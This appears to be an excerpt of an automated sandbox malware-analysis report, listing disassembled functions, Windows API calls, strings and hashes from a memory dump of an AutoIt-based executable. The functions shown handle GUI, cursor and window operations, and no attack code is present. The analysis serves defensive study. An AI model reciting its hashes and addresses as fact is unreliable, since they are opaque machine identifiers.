                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 699586101-1459072770
                                                                            • Opcode ID: 57c51830adf9be4b3c181f16abefbec611dcd6f641443f9616d6a9b8ce6e353e
                                                                            • Instruction ID: 32a17a598e77993feae8fb6c87dc7f84144fc432d4bdb616f35f6287df83d48d
                                                                            • Opcode Fuzzy Hash: 57c51830adf9be4b3c181f16abefbec611dcd6f641443f9616d6a9b8ce6e353e
                                                                            • Instruction Fuzzy Hash: 7F413872A21305BBEF15FB608C47EBF776CEF41710F00001BF905A6192EB749E219AA5
                                                                            Function 00272BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00272C8C
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00272C94
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00272CBF
                                                                            • GetSystemMetrics.USER32(00000008), ref: 00272CC7
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00272CEC
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00272D09
                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00272D19
                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00272D4C
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00272D60
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00272D7E
                                                                            • GetStockObject.GDI32(00000011), ref: 00272D9A
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00272DA5
                                                                              • Part of subcall function 00272714: GetCursorPos.USER32(?), ref: 00272727
                                                                              • Part of subcall function 00272714: ScreenToClient.USER32(003377B0,?), ref: 00272744
                                                                              • Part of subcall function 00272714: GetAsyncKeyState.USER32(00000001), ref: 00272769
                                                                              • Part of subcall function 00272714: GetAsyncKeyState.USER32(00000002), ref: 00272777
                                                                            • SetTimer.USER32(00000000,00000000,00000028,002713C7), ref: 00272DCC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI$h0
                                                                            • API String ID: 1458621304-2022682891
                                                                            • Opcode ID: d30b079c12bc27dc2125cc54b4fe5ed7a18360c1b31a6abbf280d7e9f84ab1cf
                                                                            • Instruction ID: 30475209418d41b1be6a38ffa196948c24c1d8198370dbe4ea585b680728cbf9
                                                                            • Opcode Fuzzy Hash: d30b079c12bc27dc2125cc54b4fe5ed7a18360c1b31a6abbf280d7e9f84ab1cf
                                                                            • Instruction Fuzzy Hash: BEB1707161420ADFDB15DFA8DD95BAD7BB8FB08310F10812AFA19A7290DB74A860CF54
                                                                            Function 00290429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • GetForegroundWindow.USER32(00300980,?,?,?,?,?), ref: 002904E3
                                                                            • IsWindow.USER32(?), ref: 002C66BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Foreground_memmove
                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                            • API String ID: 3828923867-1919597938
                                                                            • Opcode ID: 724508a4f3c4c257e27e66d8095df2b24622659165d2fedd2a011f992f4a03fa
                                                                            • Instruction ID: 068ba87b421310da97a56f4d9aeaa4351f13941f364ffcae09d11cf63d2a712d
                                                                            • Opcode Fuzzy Hash: 724508a4f3c4c257e27e66d8095df2b24622659165d2fedd2a011f992f4a03fa
                                                                            • Instruction Fuzzy Hash: 62D190301256069FCB08EF60C485BAABBB9FF54344F204A1DF495575A2DB30E9B9CF92
                                                                            Function 002F441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 002F44AC
                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002F456C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                            • API String ID: 3974292440-719923060
                                                                            • Opcode ID: b03b86eb2cde493976a2e89378a51ae6e02e26409ae9dfcc751e6ba0fd46dfdc
                                                                            • Instruction ID: 2eef624e86430ece766e44e35806661bac6156841cc76d3cbacc7b1ff0270d33
                                                                            • Opcode Fuzzy Hash: b03b86eb2cde493976a2e89378a51ae6e02e26409ae9dfcc751e6ba0fd46dfdc
                                                                            • Instruction Fuzzy Hash: 8AA14C342342199FCB14FF20C851A7AB3A5EF89354F108968A9969B2D2DBB0ED25CF51
                                                                            Function 002E56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 002E56E1
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 002E56EC
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 002E56F7
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 002E5702
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 002E570D
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 002E5718
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 002E5723
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 002E572E
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 002E5739
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 002E5744
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 002E574F
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 002E575A
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 002E5765
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 002E5770
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 002E577B
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 002E5786
                                                                            • GetCursorInfo.USER32(?), ref: 002E5796
                                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 002E57C1
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                            • String ID:
                                                                            • API String ID: 3215588206-0
                                                                            • Opcode ID: 34875ede037afda29b2faa3d3f721b2ce889e57f556bae1341e20ceba2f74b94
                                                                            • Instruction ID: 83a78e3f6bdc9b5c6b98a1efdda5dee8e56e189331ee50aca22a91a6c4f3d858
                                                                            • Opcode Fuzzy Hash: 34875ede037afda29b2faa3d3f721b2ce889e57f556bae1341e20ceba2f74b94
                                                                            • Instruction Fuzzy Hash: 2E417370E54319AADB109FBA8C49D6EFFF8EF41B10F10452FE109E7290DAB8A500CE51
                                                                            Function 002CB13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 002CB17B
                                                                            • __swprintf.LIBCMT ref: 002CB21C
                                                                            • _wcscmp.LIBCMT ref: 002CB22F
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002CB284
                                                                            • _wcscmp.LIBCMT ref: 002CB2C0
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 002CB2F7
                                                                            • GetDlgCtrlID.USER32(?), ref: 002CB349
                                                                            • GetWindowRect.USER32(?,?), ref: 002CB37F
                                                                            • GetParent.USER32(?), ref: 002CB39D
                                                                            • ScreenToClient.USER32(00000000), ref: 002CB3A4
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 002CB41E
                                                                            • _wcscmp.LIBCMT ref: 002CB432
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 002CB458
                                                                            • _wcscmp.LIBCMT ref: 002CB46C
                                                                              • Part of subcall function 0029385C: _iswctype.LIBCMT ref: 00293864
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                            • String ID: %s%u
                                                                            • API String ID: 3744389584-679674701
                                                                            • Opcode ID: 8d6aff1c3f2a991ad5e055fa8ea88a9a8d2b5e531c9f35b694d2d044436c68ff
                                                                            • Instruction ID: 8d3b3db7d607bce23f3ad5ccdcf5a58a50f4ee90d2b788f8d8c5a1438cbac0da
                                                                            • Opcode Fuzzy Hash: 8d6aff1c3f2a991ad5e055fa8ea88a9a8d2b5e531c9f35b694d2d044436c68ff
                                                                            • Instruction Fuzzy Hash: DCA1F171224207AFDB1ADF64C896FAAB7E8FF44314F00461EF999C2191DB30E965CB91
                                                                            Function 002CBA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 002CBAB1
                                                                            • _wcscmp.LIBCMT ref: 002CBAC2
                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 002CBAEA
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 002CBB07
                                                                            • _wcscmp.LIBCMT ref: 002CBB25
                                                                            • _wcsstr.LIBCMT ref: 002CBB36
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 002CBB6E
                                                                            • _wcscmp.LIBCMT ref: 002CBB7E
                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 002CBBA5
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 002CBBEE
                                                                            • _wcscmp.LIBCMT ref: 002CBBFE
                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 002CBC26
                                                                            • GetWindowRect.USER32(00000004,?), ref: 002CBC8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                            • String ID: @$ThumbnailClass
                                                                            • API String ID: 1788623398-1539354611
                                                                            • Opcode ID: 1892468e3525d6c91354d771f07af624ed946f6c8b67c4c10648b565d8e43e1a
                                                                            • Instruction ID: d5ab54016a100831596e5fd156f86513d6cd51969b8540b58253bf8b6a489cea
                                                                            • Opcode Fuzzy Hash: 1892468e3525d6c91354d771f07af624ed946f6c8b67c4c10648b565d8e43e1a
                                                                            • Instruction Fuzzy Hash: AA81A07102420A9FDB06DF14C886FAA77ECEF44314F04866EFD899A096DB30DE65CB61
                                                                            Function 002CB8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 1038674560-1810252412
                                                                            • Opcode ID: 12da1cd2f74c4718a4e0febc8e98b668b57a2f83d3fc00f18cb3c778c18852b2
                                                                            • Instruction ID: 164a7b32c0d728e3ac5e796581ec2884ce41a431097f089ff020a77a99d2952f
                                                                            • Opcode Fuzzy Hash: 12da1cd2f74c4718a4e0febc8e98b668b57a2f83d3fc00f18cb3c778c18852b2
                                                                            • Instruction Fuzzy Hash: F431E034A60616A7DB06FAA0ED03FED73A8AF20750F200229F541B10D6EF616E348E56
                                                                            Function 002CCB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(00000063), ref: 002CCBAA
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002CCBBC
                                                                            • SetWindowTextW.USER32(?,?), ref: 002CCBD3
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 002CCBE8
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 002CCBEE
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 002CCBFE
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 002CCC04
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002CCC25
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002CCC3F
                                                                            • GetWindowRect.USER32(?,?), ref: 002CCC48
                                                                            • SetWindowTextW.USER32(?,?), ref: 002CCCB3
                                                                            • GetDesktopWindow.USER32 ref: 002CCCB9
                                                                            • GetWindowRect.USER32(00000000), ref: 002CCCC0
                                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002CCD0C
                                                                            • GetClientRect.USER32(?,?), ref: 002CCD19
                                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002CCD3E
                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002CCD69
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: 9d2e4ed0a687920057bfa06cf530533532a96633569c9725dff60e46cda6f32b
                                                                            • Instruction ID: 3d03400effdb286bbd590b636d96d65495343e94c42b3a1f5e33abfd5f721d96
                                                                            • Opcode Fuzzy Hash: 9d2e4ed0a687920057bfa06cf530533532a96633569c9725dff60e46cda6f32b
                                                                            • Instruction Fuzzy Hash: A1515F70900709AFDB259FA8CE85F6EBBB9FF04705F10461DE58AA25A0CB75A914CF50
                                                                            Function 002FA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002FA87E
                                                                            • DestroyWindow.USER32(00000000,?), ref: 002FA8F8
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002FA972
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002FA994
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002FA9A7
                                                                            • DestroyWindow.USER32(00000000), ref: 002FA9C9
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00270000,00000000), ref: 002FAA00
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002FAA19
                                                                            • GetDesktopWindow.USER32 ref: 002FAA32
                                                                            • GetWindowRect.USER32(00000000), ref: 002FAA39
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002FAA51
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002FAA69
                                                                              • Part of subcall function 002729AB: GetWindowLongW.USER32(?,000000EB), ref: 002729BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 1297703922-3619404913
                                                                            • Opcode ID: ca6fdd9a352ba6c08b333ecaa4ee2e0b5350062c4ba98395388a747271d73e6b
                                                                            • Instruction ID: 5b6be7c9d22d30104955f14692b7d2029c21a5514f376abc74c85eccb5c2e21c
                                                                            • Opcode Fuzzy Hash: ca6fdd9a352ba6c08b333ecaa4ee2e0b5350062c4ba98395388a747271d73e6b
                                                                            • Instruction Fuzzy Hash: D5718DB1160209AFD726CF28CC59F76B7F9EB88340F04452DFA89872A1D771A925CB52
                                                                            Function 002FCCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 002FCCCF
                                                                              • Part of subcall function 002FB1A9: ClientToScreen.USER32(?,?), ref: 002FB1D2
                                                                              • Part of subcall function 002FB1A9: GetWindowRect.USER32(?,?), ref: 002FB248
                                                                              • Part of subcall function 002FB1A9: PtInRect.USER32(?,?,002FC6BC), ref: 002FB258
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 002FCD38
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002FCD43
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002FCD66
                                                                            • _wcscat.LIBCMT ref: 002FCD96
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002FCDAD
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 002FCDC6
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 002FCDDD
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 002FCDFF
                                                                            • DragFinish.SHELL32(?), ref: 002FCE06
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002FCEF9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                            • API String ID: 169749273-3440237614
                                                                            • Opcode ID: 07ba1da44f28d503a2e469839450e39cf82e938f9eca6c43edc49d43c5e07f2f
                                                                            • Instruction ID: 022a5793ca249a6f7da65817450345f078d82e6adf3cb72095c4932bb045da3e
                                                                            • Opcode Fuzzy Hash: 07ba1da44f28d503a2e469839450e39cf82e938f9eca6c43edc49d43c5e07f2f
                                                                            • Instruction Fuzzy Hash: 81619B71118305AFC716EF50DC85EAFBBE8EF88340F000A2EF695921A1DB709A19CF52
                                                                            Function 002D82D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000000), ref: 002D831A
                                                                            • VariantCopy.OLEAUT32(00000000,?), ref: 002D8323
                                                                            • VariantClear.OLEAUT32(00000000), ref: 002D832F
                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002D841D
                                                                            • __swprintf.LIBCMT ref: 002D844D
                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 002D8479
                                                                            • VariantInit.OLEAUT32(?), ref: 002D852A
                                                                            • SysFreeString.OLEAUT32(?), ref: 002D85BE
                                                                            • VariantClear.OLEAUT32(?), ref: 002D8618
                                                                            • VariantClear.OLEAUT32(?), ref: 002D8627
                                                                            • VariantInit.OLEAUT32(00000000), ref: 002D8665
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                            • API String ID: 3730832054-3931177956
                                                                            • Opcode ID: 585440387aa9b640bcffdf4621e64c4fdc6218f988ab5188fa1a35b9d752db57
